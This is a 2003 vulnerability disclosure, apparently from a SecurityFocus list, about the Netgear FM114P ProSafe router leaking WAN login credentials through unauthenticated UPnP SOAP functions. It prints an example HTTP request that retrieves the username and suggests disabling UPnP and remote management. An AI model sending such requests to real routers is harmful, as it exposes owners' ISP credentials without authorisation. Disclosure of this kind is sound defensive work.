Another security problem in Netgear FM114P ProSafe Wireless Router firmware Apr 02 2003 05:58PM
Björn Stickler (stickler rbg informatik tu-darmstadt de)
i found another security problem in netgear prosafe wireless router model
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. this
is done by using upnp soap requests to the router with the functions
GetUserName and GetPassword. i don´t know why such functions exist, because
router configuration is normally done via web-interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />

---- end of example request to get username --------------

affected firmware versions: --> v1.4 Beta Release 21 has been tested
--> all previous versions with upnp may be

solution: disable remote management and/or upnp until bug is fixed by

regards, b.stickler


[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus